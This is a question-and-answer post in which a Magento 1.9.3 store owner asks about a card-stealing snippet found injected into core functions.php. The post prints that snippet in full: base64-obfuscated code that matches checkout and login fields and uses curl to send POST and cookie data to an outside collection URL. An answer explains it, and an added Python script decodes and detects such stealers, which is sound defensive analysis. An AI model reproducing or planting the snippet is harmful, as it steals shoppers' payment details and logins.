Tags: php, magento, magento-1.9, malware

Server side scanner detected "php.malware.magento-cc-stealer.069"


I have a server-side scanner that scans my site for any traces of malicious code. I came in this morning to see that it reported php.malware.magento-cc-stealer.069 in my app/code/core/Mage/Core/functions.php file.

I run an online store using Magento version 1.9.3.

I went through this file and compared it against the mirror copy of the clean Magento 1.9.3 functions.php file.

I found that this had been added to my file:

if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
    exec("curl --data \"version=1&encode=".base64_encode(   serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");

Could anyone explain what this does and what consequences it has?

As far as I understand, the first line of this if statement says that if the data matches the encoded text (billing|firstname|cc_number|login|username|payment|cc_) and is case sensitive, generate a storable representation of a value and post it. I'm struggling with the second line though.


Solution

  • As the name suggests, it is trying to steal credit card information.

    It will trigger any time these credit card fields appear in the POST request, and it will just send them together with cookie info and your server address via curl to https://magescripts.info/testServer.php (DON'T CLICK!), which is presumably another victim hosting the attacker's collection script. Note: if magescripts.info is your domain, your search is not over; you should find where testServer.php points and remove that as well.
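As an added example (not code from the question or the answer above), the Python below decodes the two base64 literals in the injected snippet and emulates the preg_match over serialize($_POST), so you can see both what the snippet decodes to and which requests would actually be exfiltrated. The INJECTED_PHP sample is the pair of lines quoted in the question; the scanner regexes, the php_serialize helper and the sample POST bodies are my own constructions, and the whole thing runs offline.

```python
import base64
import re

# Constructed sample: the two injected lines quoted in the question, so the
# scanner can be exercised offline against exactly the code that was found.
INJECTED_PHP = r'''if (preg_match("/".base64_decode('YmlsbGluZ3xmaXJzdG5hbWV8Y2NfbnVtYmVyfGxvZ2lufHVzZXJuYW1lfHBheW1lbnR8Y2Nf')."/i", serialize($_POST)))
    exec("curl --data \"version=1&encode=".base64_encode(   serialize($_POST) . "--" . serialize($_COOKIE) )."&host=".$_SERVER["HTTP_HOST"]."\" ".base64_decode('aHR0cHM6Ly9tYWdlc2NyaXB0cy5pbmZvL3Rlc3RTZXJ2ZXIucGhw')." > /dev/null 2<&1 &");'''

# Matches base64_decode('....') / base64_decode("....") with a literal argument.
B64_LITERAL = re.compile(r"""base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)""")


def decode_base64_literals(php_source):
    """Return the plaintext of every base64_decode('...') literal in the source."""
    out = []
    for m in B64_LITERAL.finditer(php_source):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except (ValueError, UnicodeError):
            out.append(m.group(1))  # not valid base64: keep the raw literal for the analyst
    return out


def find_exfil_indicators(php_source):
    """Flag the building blocks of a form stealer: a decoded trigger pattern,
    a decoded URL, serialisation of request superglobals and an exec'd curl.
    (Hypothetical heuristics, not the scanner product's signature.)"""
    decoded = decode_base64_literals(php_source)
    return {
        "decoded_strings": decoded,
        "trigger_patterns": [s for s in decoded
                             if "|" in s and re.search(r"cc_|billing|payment|login|password", s, re.I)],
        "urls": [s for s in decoded if re.match(r"https?://", s, re.I)],
        "serialises_request": bool(re.search(r"serialize\(\s*\$_(POST|COOKIE|REQUEST)", php_source)),
        "exec_curl": bool(re.search(r"\b(exec|shell_exec|system|passthru)\s*\(\s*\"curl", php_source)),
    }


def php_serialize(assoc):
    """Minimal PHP serialize() for a flat array of strings, i.e. what $_POST
    looks like to the injected preg_match. Note the keys are in the haystack."""
    parts = ["a:%d:{" % len(assoc)]
    for k, v in assoc.items():
        parts.append('s:%d:"%s";s:%d:"%s";' % (len(k.encode()), k, len(v.encode()), v))
    parts.append("}")
    return "".join(parts)


def would_trigger(post, pattern):
    """Emulate preg_match("/<pattern>/i", serialize($_POST)) for one request."""
    return re.search(pattern, php_serialize(post), re.IGNORECASE) is not None


if __name__ == "__main__":
    report = find_exfil_indicators(INJECTED_PHP)
    for key, value in report.items():
        print(key, "=>", value)
    pattern = report["trigger_patterns"][0]
    # Constructed POST bodies: a checkout, a login form and a harmless search.
    for body in ({"cc_number": "4111111111111111", "cc_cid": "123"},
                 {"username": "admin", "password": "hunter2"},
                 {"q": "blue shoes"}):
        print(body, "->", "exfiltrated" if would_trigger(body, pattern) else "ignored")
```

Two things the emulation makes visible that the decoded pattern alone does not: serialize() puts the array keys into the string that is matched, and the pattern includes login and username, so customer and admin logins are sent to the collection endpoint as well as card data; and the trailing cc_ alternative is a bare substring, so any field whose name contains it (cc_cid, cc_exp_month, and so on) is enough on its own. Decoding the literals of any variant you find in the same way tells you its trigger fields and its collection URL.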